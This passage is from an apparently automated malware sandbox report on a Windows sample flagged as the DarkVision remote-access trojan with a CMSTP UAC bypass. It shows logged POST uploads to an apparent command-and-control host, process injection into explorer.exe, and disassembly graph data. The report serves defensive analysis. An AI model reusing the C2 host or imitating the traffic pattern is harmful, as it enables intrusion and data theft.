                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                        Content-Length: 422
                        Dec 31, 2024 07:33:04.517960072 CET254INHTTP/1.1 200 OK
                        Date: Tue, 31 Dec 2024 06:33:04 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                        X-Powered-By: PHP/8.0.30
                        Content-Length: 1
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/plain;charset=UTF-8
                        Data Raw: 31
                        Data Ascii: 1
                        Dec 31, 2024 07:33:04.523140907 CET235OUTPOST /upload.php HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: multipart/form-data; boundary=part
                        Host: jholo.duckdns.org
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                        Content-Length: 417
                        Dec 31, 2024 07:33:04.889858961 CET253INHTTP/1.1 200 OK
                        Date: Tue, 31 Dec 2024 06:33:04 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                        X-Powered-By: PHP/8.0.30
                        Content-Length: 1
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/plain;charset=UTF-8
                        Data Raw: 31
                        Data Ascii: 1
                        Dec 31, 2024 07:33:04.893091917 CET235OUTPOST /upload.php HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: multipart/form-data; boundary=part
                        Host: jholo.duckdns.org
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                        Content-Length: 541
                        Dec 31, 2024 07:33:05.397989988 CET253INHTTP/1.1 200 OK
                        Date: Tue, 31 Dec 2024 06:33:04 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                        X-Powered-By: PHP/8.0.30
                        Content-Length: 1
                        Keep-Alive: timeout=5, max=98
                        Connection: Keep-Alive
                        Content-Type: text/plain;charset=UTF-8
                        Data Raw: 31
                        Data Ascii: 1
                        Dec 31, 2024 07:33:05.545919895 CET235OUTPOST /upload.php HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: multipart/form-data; boundary=part
                        Host: jholo.duckdns.org
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                        Content-Length: 536
                        Dec 31, 2024 07:33:05.917752028 CET253INHTTP/1.1 200 OK
                        Date: Tue, 31 Dec 2024 06:33:05 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                        X-Powered-By: PHP/8.0.30
                        Content-Length: 1
                        Keep-Alive: timeout=5, max=97
                        Connection: Keep-Alive
                        Content-Type: text/plain;charset=UTF-8
                        Data Raw: 31
                        Data Ascii: 1


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:01:32:59
                        Start date:31/12/2024
                        Path:C:\Users\user\Desktop\uncrypted.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\uncrypted.exe"
                        Imagebase:0x9a0000
                        File size:1'028'096 bytes
                        MD5 hash:84E8A17E39EF16DCE73DA924CED012D5
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000000.00000002.2055171521.0000000003F40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2055171521.0000000003F40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000000.00000002.2055171521.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2055171521.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000000.00000002.2055171521.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2055171521.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000000.00000002.2054936122.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2054936122.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:2
                        Start time:01:33:00
                        Start date:31/12/2024
                        Path:C:\Users\user\Desktop\uncrypted.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\uncrypted.exe"
                        Imagebase:0xa90000
                        File size:1'028'096 bytes
                        MD5 hash:84E8A17E39EF16DCE73DA924CED012D5
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000002.00000002.2041385974.00000000011C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.2041385974.00000000011C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:3
                        Start time:01:33:00
                        Start date:31/12/2024
                        Path:C:\Windows\explorer.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\explorer.exe"
                        Imagebase:0x7ff674740000
                        File size:5'141'208 bytes
                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:false

                        General

                        Target ID:4
                        Start time:01:33:02
                        Start date:31/12/2024
                        Path:C:\Windows\explorer.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\EXPLORER.EXE {2046C745-B848-47EE-8068-B039EAC15A1C}
                        Imagebase:0x7ff674740000
                        File size:5'141'208 bytes
                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:9.9%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:30.8%
                          Total number of Nodes:39
                          Total number of Limit Nodes:6
                          execution_graph 11261 121e160 11262 121e1a2 11261->11262 11263 121e1a8 GetModuleHandleW 11261->11263 11262->11263 11264 121e1d5 11263->11264 11286 1210b52 11292 1211450 11286->11292 11296 1210d4f 11286->11296 11300 1210d58 11286->11300 11304 1211329 11286->11304 11295 121140e 11292->11295 11293 121162a 11294 1210534 VirtualProtect 11294->11295 11295->11293 11295->11294 11299 1210d7f 11296->11299 11297 121162a 11298 1210534 VirtualProtect 11298->11299 11299->11297 11299->11298 11303 1210d7f 11300->11303 11301 121162a 11302 1210534 VirtualProtect 11302->11303 11303->11301 11303->11302 11306 1211310 11304->11306 11305 121162a 11306->11305 11307 1210534 VirtualProtect 11306->11307 11307->11306 11265 1217527 11266 121752b 11265->11266 11269 1217611 11266->11269 11270 1217635 11269->11270 11274 1217b19 11270->11274 11278 1217b28 11270->11278 11271 121754e 11276 1217b28 11274->11276 11275 1217c2c 11275->11275 11276->11275 11282 1216f9c 11276->11282 11280 1217b4f 11278->11280 11279 1217c2c 11280->11279 11281 1216f9c CreateActCtxA 11280->11281 11281->11279 11283 1218bb8 CreateActCtxA 11282->11283 11285 1218c7b 11283->11285 11308 12130d8 11309 1213120 VirtualProtect 11308->11309 11310 121315a 11309->11310

                          Executed Functions

                          Function 01210D58 Relevance: 5.7, Strings: 4, Instructions: 743COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 309 1210d58-1210dab 313 1210db8-1210e44 call 1210114 309->313 314 1210dad 309->314 323 1210e50-1210e60 313->323 324 1210e46-1210e4a 313->324 314->313 326 1210e66-1210eb3 323->326 324->323 331 1210eb8-1210ebb 326->331 332 1210ec4-1210ecb 331->332 333 1210ebd 331->333 360 1210ed8-1210f01 332->360 361 1210ecd 332->361 333->326 333->332 334 1210f21-1210f2a 333->334 335 1211222 333->335 336 1210fe4-1210fe9 333->336 337 1210fa9 333->337 338 1211129-12111ae 333->338 339 1211228-1211234 333->339 340 12110ab-12110d4 333->340 341 1210fee-1211012 333->341 342 1211035-1211041 333->342 343 1210f79-1210f90 333->343 344 1210fb9-1210fcb 333->344 345 1211079-1211080 333->345 346 12111bf-12111c4 333->346 347 1211201-121120c 333->347 348 1210f03-1210f1f 333->348 349 12111c6-12111db 333->349 350 121120e-1211216 333->350 351 1211111-1211124 333->351 352 1210fd0-1210fdf 333->352 353 1211052-1211065 333->353 354 1210f95-1210f9a 333->354 355 1211017-1211030 call 12100e4 333->355 356 12110d9-12110dd 333->356 357 1211218-1211220 333->357 358 12111dd-12111ff 333->358 359 121125e-121126a 333->359 367 1210f2d-1210f44 334->367 335->339 336->331 363 1210fac-1210fb4 337->363 364 12111b3-12111b6 338->364 339->358 365 1211236-12112ff 339->365 340->331 341->331 399 1211043 342->399 400 1211045-121104d 342->400 343->331 344->331 366 1211086-121108c 345->366 345->367 346->364 347->364 348->331 349->364 350->364 351->331 352->331 353->345 402 1211067-121106e 353->402 362 1210f47-1210f52 354->362 355->338 356->342 368 12110e3-121110c 356->368 357->364 358->364 359->350 401 121126c-12112c5 359->401 360->331 361->360 385 1210f54 362->385 386 1210f5a-1210f74 362->386 363->331 364->346 371 12111b8 364->371 424 1211301 365->424 425 121130d 365->425 366->367 369 1211092-121109b 366->369 367->362 368->331 369->367 403 12110a1-12110a6 369->403 371->335 371->338 371->339 371->346 371->347 371->349 371->350 371->357 371->358 371->359 388 1211465-1211468 371->388 389 12113a9-12113cd 371->389 390 121140e-121144e 371->390 391 1211310-1211327 371->391 392 12113d2-12113f1 371->392 393 1211559-1211595 371->393 394 12114bc 371->394 395 121149f-12114a9 371->395 396 121133e-12113fd 371->396 406 1210f56-1210f58 385->406 407 1210f9c-1210fa4 385->407 386->331 410 121146a-121146d 388->410 411 121146f 388->411 433 1211332-1211335 389->433 435 1211459-121145c 390->435 391->433 392->433 415 1211785-1211792 393->415 454 121159b-121159f 393->454 422 12114c7-1211539 call 12100f4 394->422 395->415 416 12114af-12114b3 395->416 492 121140b 396->492 493 12113ff 396->493 399->400 400->331 481 12112cb-12112f3 401->481 402->337 417 1211074 402->417 403->331 406->386 406->407 407->331 407->337 410->411 420 121147a-121148c call 1211848 410->420 411->420 421 12114b5-12114ba 416->421 416->422 417->363 438 1211492-121149d 420->438 421->435 509 1211545-1211557 422->509 510 121153b-121153f 422->510 424->425 425->391 433->396 441 1211337 433->441 435->388 437 121145e 435->437 437->388 437->390 437->393 437->394 437->395 446 1211642-121166f call 1210534 437->446 447 12115ad-12115cb 437->447 448 12115f5-1211601 437->448 449 1211697-12116af 437->449 450 12116fb-121170a 437->450 451 121161a-1211622 437->451 452 12115dc-12115f3 437->452 453 121174a-1211752 437->453 438->435 441->388 441->389 441->390 441->391 441->392 441->393 441->394 441->395 441->396 441->446 441->447 441->448 441->449 441->450 441->451 441->452 487 1211674-1211683 446->487 463 12115d0-12115d3 447->463 456 1211757 448->456 457 1211607-121160e 448->457 467 1211610-1211618 449->467 478 12116b5-12116f6 449->478 479 1211713-1211715 450->479 480 121170c-1211711 450->480 458 1211624 451->458 459 121162a-121163d 451->459 452->463 453->463 454->435 465 12115a5-12115a8 454->465 469 121175c-1211763 456->469 457->467 458->449 468 1211626-1211628 458->468 459->469 463->452 474 12115d5 463->474 465->435 467->463 468->449 468->459 483 1211771-1211772 469->483 484 1211765 469->484 474->446 474->447 474->448 474->449 474->450 474->451 474->452 474->453 478->463 488 121171b-121173b call 1210534 479->488 480->488 481->364 483->415 484->483 487->456 494 1211689-1211692 487->494 505 1211740-1211745 488->505 492->390 493->492 494->463 505->463 509->447 510->509
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2054740817.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1210000_uncrypted.jbxd
                          Similarity
                          • API ID:
                          • String ID: PO]q$TJbq$TJbq$Te]q
                          • API String ID: 0-3124343824
                          • Opcode ID: 9f77213a919a350f1ccff6c0ef6278d1c7c8e86886288d4b49e748c00790c54d
                          • Instruction ID: bdc10d295c1801d42e8f57a234e408f9aa691aee38de33aee08803ddb2f7ff53
                          • Opcode Fuzzy Hash: 9f77213a919a350f1ccff6c0ef6278d1c7c8e86886288d4b49e748c00790c54d
                          • Instruction Fuzzy Hash: CF620634A202148FDB54CF69C994B69BBF2FF98700F1581A9E60A9B365CA70ED81CF51
                          Function 01210D4F Relevance: 5.7, Strings: 4, Instructions: 733COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 513 1210d4f-1210dab 517 1210db8-1210e44 call 1210114 513->517 518 1210dad 513->518 527 1210e50-1210e60 517->527 528 1210e46-1210e4a 517->528 518->517 530 1210e66-1210eb3 527->530 528->527 535 1210eb8-1210ebb 530->535 536 1210ec4-1210ecb 535->536 537 1210ebd 535->537 564 1210ed8-1210f01 536->564 565 1210ecd 536->565 537->530 537->536 538 1210f21-1210f2a 537->538 539 1211222 537->539 540 1210fe4-1210fe9 537->540 541 1210fa9 537->541 542 1211129-12111ae 537->542 543 1211228-1211234 537->543 544 12110ab-12110d4 537->544 545 1210fee-1211012 537->545 546 1211035-1211041 537->546 547 1210f79-1210f90 537->547 548 1210fb9-1210fcb 537->548 549 1211079-1211080 537->549 550 12111bf-12111c4 537->550 551 1211201-121120c 537->551 552 1210f03-1210f1f 537->552 553 12111c6-12111db 537->553 554 121120e-1211216 537->554 555 1211111-1211124 537->555 556 1210fd0-1210fdf 537->556 557 1211052-1211065 537->557 558 1210f95-1210f9a 537->558 559 1211017-1211030 call 12100e4 537->559 560 12110d9-12110dd 537->560 561 1211218-1211220 537->561 562 12111dd-12111ff 537->562 563 121125e-121126a 537->563 571 1210f2d-1210f44 538->571 539->543 540->535 567 1210fac-1210fb4 541->567 568 12111b3-12111b6 542->568 543->562 569 1211236-12112ff 543->569 544->535 545->535 603 1211043 546->603 604 1211045-121104d 546->604 547->535 548->535 570 1211086-121108c 549->570 549->571 550->568 551->568 552->535 553->568 554->568 555->535 556->535 557->549 606 1211067-121106e 557->606 566 1210f47-1210f52 558->566 559->542 560->546 572 12110e3-121110c 560->572 561->568 562->568 563->554 605 121126c-12112c5 563->605 564->535 565->564 589 1210f54 566->589 590 1210f5a-1210f74 566->590 567->535 568->550 575 12111b8 568->575 628 1211301 569->628 629 121130d 569->629 570->571 573 1211092-121109b 570->573 571->566 572->535 573->571 607 12110a1-12110a6 573->607 575->539 575->542 575->543 575->550 575->551 575->553 575->554 575->561 575->562 575->563 592 1211465-1211468 575->592 593 12113a9-12113cd 575->593 594 121140e-121144e 575->594 595 1211310-1211327 575->595 596 12113d2-12113f1 575->596 597 1211559-1211595 575->597 598 12114bc 575->598 599 121149f-12114a9 575->599 600 121133e-12113fd 575->600 610 1210f56-1210f58 589->610 611 1210f9c-1210fa4 589->611 590->535 614 121146a-121146d 592->614 615 121146f 592->615 637 1211332-1211335 593->637 639 1211459-121145c 594->639 595->637 596->637 619 1211785-1211792 597->619 658 121159b-121159f 597->658 626 12114c7-1211539 call 12100f4 598->626 599->619 620 12114af-12114b3 599->620 696 121140b 600->696 697 12113ff 600->697 603->604 604->535 685 12112cb-12112f3 605->685 606->541 621 1211074 606->621 607->535 610->590 610->611 611->535 611->541 614->615 624 121147a-121148c call 1211848 614->624 615->624 625 12114b5-12114ba 620->625 620->626 621->567 642 1211492-121149d 624->642 625->639 713 1211545-1211557 626->713 714 121153b-121153f 626->714 628->629 629->595 637->600 645 1211337 637->645 639->592 641 121145e 639->641 641->592 641->594 641->597 641->598 641->599 650 1211642-121166f call 1210534 641->650 651 12115ad-12115cb 641->651 652 12115f5-1211601 641->652 653 1211697-12116af 641->653 654 12116fb-121170a 641->654 655 121161a-1211622 641->655 656 12115dc-12115f3 641->656 657 121174a-1211752 641->657 642->639 645->592 645->593 645->594 645->595 645->596 645->597 645->598 645->599 645->600 645->650 645->651 645->652 645->653 645->654 645->655 645->656 691 1211674-1211683 650->691 667 12115d0-12115d3 651->667 660 1211757 652->660 661 1211607-121160e 652->661 671 1211610-1211618 653->671 682 12116b5-12116f6 653->682 683 1211713-1211715 654->683 684 121170c-1211711 654->684 662 1211624 655->662 663 121162a-121163d 655->663 656->667 657->667 658->639 669 12115a5-12115a8 658->669 673 121175c-1211763 660->673 661->671 662->653 672 1211626-1211628 662->672 663->673 667->656 678 12115d5 667->678 669->639 671->667 672->653 672->663 687 1211771-1211772 673->687 688 1211765 673->688 678->650 678->651 678->652 678->653 678->654 678->655 678->656 678->657 682->667 692 121171b-121173b call 1210534 683->692 684->692 685->568 687->619 688->687 691->660 698 1211689-1211692 691->698 709 1211740-1211745 692->709 696->594 697->696 698->667 709->667 713->651 714->713
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2054740817.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1210000_uncrypted.jbxd
                          Similarity
                          • API ID:
                          • String ID: PO]q$TJbq$TJbq$Te]q
                          • API String ID: 0-3124343824
                          • Opcode ID: 06bacb155fab60c580e67e215791e0aedf5dbe784189a06911d74565cdc1018c
                          • Instruction ID: cf25cf946a4cb7e03797cd979e1dde32c073edd6b5a1a372f7b231eb45e8538d
                          • Opcode Fuzzy Hash: 06bacb155fab60c580e67e215791e0aedf5dbe784189a06911d74565cdc1018c
                          • Instruction Fuzzy Hash: F8620734A20114CFDB54CF69C994B69BBF2FF98700F1581A9E60A9B3A5CA70ED81CF11
                          Function 01211329 Relevance: 2.8, Strings: 2, Instructions: 296COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 740 1211329-1211330 741 1211310-1211327 740->741 742 1211332-1211335 740->742 741->742 743 1211337 742->743 744 121133e-12113fd 742->744 743->741 743->744 746 1211642-121166f call 1210534 743->746 747 1211465-1211468 743->747 748 12113a9-12113cd 743->748 749 12115ad-12115cb 743->749 750 121140e-121144e 743->750 751 12113d2-12113f1 743->751 752 12115f5-1211601 743->752 753 1211697-12116af 743->753 754 1211559-1211595 743->754 755 12116fb-121170a 743->755 756 121161a-1211622 743->756 757 12114bc 743->757 758 12115dc-12115f3 743->758 759 121149f-12114a9 743->759 821 121140b 744->821 822 12113ff 744->822 795 1211674-1211683 746->795 765 121146a-121146d 747->765 766 121146f 747->766 748->742 784 12115d0-12115d3 749->784 791 1211459-121145c 750->791 751->742 760 1211757 752->760 761 1211607-121160e 752->761 770 1211610-1211618 753->770 789 12116b5-12116f6 753->789 767 1211785-1211792 754->767 809 121159b-121159f 754->809 792 1211713-1211715 755->792 793 121170c-1211711 755->793 762 1211624 756->762 763 121162a-121163d 756->763 780 12114c7-1211539 call 12100f4 757->780 758->784 759->767 768 12114af-12114b3 759->768 773 121175c-1211763 760->773 761->770 762->753 771 1211626-1211628 762->771 763->773 765->766 776 121147a-121148c call 1211848 765->776 766->776 779 12114b5-12114ba 768->779 768->780 770->784 771->753 771->763 785 1211771-1211772 773->785 786 1211765 773->786 798 1211492-121149d 776->798 779->791 829 1211545-1211557 780->829 830 121153b-121153f 780->830 784->758 801 12115d5 784->801 785->767 786->785 789->784 791->747 796 121145e 791->796 799 121171b-121173b call 1210534 792->799 793->799 795->760 805 1211689-1211692 795->805 796->746 796->747 796->749 796->750 796->752 796->753 796->754 796->755 796->756 796->757 796->758 796->759 806 121174a-1211752 796->806 798->791 817 1211740-1211745 799->817 801->746 801->749 801->752 801->753 801->755 801->756 801->758 801->806 805->784 806->784 809->791 812 12115a5-12115a8 809->812 812->791 817->784 821->750 822->821 829->749 830->829
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2054740817.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1210000_uncrypted.jbxd
                          Similarity
                          • API ID:
                          • String ID: TJbq$Te]q
                          • API String ID: 0-3147309840
                          • Opcode ID: 1698fbc85fbc3a84a6f3f6f8c289efa19b66f5db1c09c7fc53cb24ba9ec98de9
                          • Instruction ID: 13444f59049fc3025046de15830f4e129a751ca8d897380333c0e82855d19b85
                          • Opcode Fuzzy Hash: 1698fbc85fbc3a84a6f3f6f8c289efa19b66f5db1c09c7fc53cb24ba9ec98de9
                          • Instruction Fuzzy Hash: DBD13A34A20215CFDB64DF68C894B6ABBF2FF98700F158099D60A9B369DB70AD41CF41
                          Function 01218BAC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1077 1218bac-1218c79 CreateActCtxA 1079 1218c82-1218cdc 1077->1079 1080 1218c7b-1218c81 1077->1080 1087 1218ceb-1218cef 1079->1087 1088 1218cde-1218ce1 1079->1088 1080->1079 1089 1218cf1-1218cfd 1087->1089 1090 1218d00 1087->1090 1088->1087 1089->1090 1092 1218d01 1090->1092 1092->1092
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 01218C69
                          Memory Dump Source
                          • Source File: 00000000.00000002.2054740817.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1210000_uncrypted.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: 181a8e0a0d7ea53990467340016fdac0971fbc6bbde8af64344020095e38034c
                          • Instruction ID: 1ab36979c9496aab1ada77fd77b5a6c8af460ca00eabaaca25534939f8844504
                          • Opcode Fuzzy Hash: 181a8e0a0d7ea53990467340016fdac0971fbc6bbde8af64344020095e38034c
                          • Instruction Fuzzy Hash: F9410FB1C00719CFDB28DFA9C884B9EBBF1BF48304F24806AD418AB255DB756946CF91
                          Function 01216F9C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1093 1216f9c-1218c79 CreateActCtxA 1096 1218c82-1218cdc 1093->1096 1097 1218c7b-1218c81 1093->1097 1104 1218ceb-1218cef 1096->1104 1105 1218cde-1218ce1 1096->1105 1097->1096 1106 1218cf1-1218cfd 1104->1106 1107 1218d00 1104->1107 1105->1104 1106->1107 1109 1218d01 1107->1109 1109->1109
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 01218C69
                          Memory Dump Source
                          • Source File: 00000000.00000002.2054740817.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1210000_uncrypted.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: 7826efc9f365aaae6809656c5745730dab79afc0aa7b89b677960ad86215f68e
                          • Instruction ID: d7479c9335bb9ae80c57f3c5a7ed3fe229ae17c54b8de03751ac4d23d35c2489
                          • Opcode Fuzzy Hash: 7826efc9f365aaae6809656c5745730dab79afc0aa7b89b677960ad86215f68e
                          • Instruction Fuzzy Hash: 1741F1B0C00719CBDB28DFA9C884B9EBBF5BF48304F20816AD508AB255DB756945CF90
                          Function 012130AD Relevance: 1.6, APIs: 1, Instructions: 76memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1110 12130ad-12130bc 1111 12130ec-1213158 VirtualProtect 1110->1111 1112 12130be-12130e9 1110->1112 1114 1213161-1213182 1111->1114 1115 121315a-1213160 1111->1115 1112->1111 1115->1114
                          APIs
                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0121314B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2054740817.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1210000_uncrypted.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: c5a62b6f8c7bc39aa20c12e5d5796f6459e9fc100338e2d45be259286a65ef9c
                          • Instruction ID: f0c20a22d00b20cebd282d375a1493ec682f8d2fdbadaaaf0a71edd38f8fad1d
                          • Opcode Fuzzy Hash: c5a62b6f8c7bc39aa20c12e5d5796f6459e9fc100338e2d45be259286a65ef9c
                          • Instruction Fuzzy Hash: 5F31AEB28153859FCB12CFA9C4406DABFF4FF5A320F2084AAD498E7262D3799545CF61
                          Function 01210534 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1117 1210534-1211b08 VirtualProtect 1120 1211b11-1211b32 1117->1120 1121 1211b0a-1211b10 1117->1121 1121->1120
                          APIs
                          • VirtualProtect.KERNELBASE(?,00000001,?,?), ref: 01211AFB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2054740817.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1210000_uncrypted.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: 816762025bb3f142073e73870594ec6b708907a48ce11091c215953a2809db6b
                          • Instruction ID: 487fd6952c4c2a827e2fb9cc9ae4b8cad9adbb79a46783b6fa21c69efc4d9ba9
                          • Opcode Fuzzy Hash: 816762025bb3f142073e73870594ec6b708907a48ce11091c215953a2809db6b
                          • Instruction Fuzzy Hash: 762106B2D002499FCB10DFAAC484BDEFBF4FB58310F108029E958A7251D378A944CFA1
                          Function 01211A81 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1123 1211a81-1211b08 VirtualProtect 1126 1211b11-1211b32 1123->1126 1127 1211b0a-1211b10 1123->1127 1127->1126
                          APIs
                          • VirtualProtect.KERNELBASE(?,00000001,?,?), ref: 01211AFB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2054740817.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1210000_uncrypted.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: 33231c01dd359262cf245caa23e5a648cc1b047d82ba9b10ccb7f4bc85142a76
                          • Instruction ID: 2a61fac274b1b37258b3eecd20d4fdf5fd4872d88433bb0e6adc5e25babb351a
                          • Opcode Fuzzy Hash: 33231c01dd359262cf245caa23e5a648cc1b047d82ba9b10ccb7f4bc85142a76
                          • Instruction Fuzzy Hash: B62106B19002499FCB10DFAAD484ADEFFF8FF49320F108429E958A7251D778A654CFA1
                          Function 012130D8 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1129 12130d8-1213158 VirtualProtect 1131 1213161-1213182 1129->1131 1132 121315a-1213160 1129->1132 1132->1131
                          APIs
                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0121314B
                          Memory Dump Source
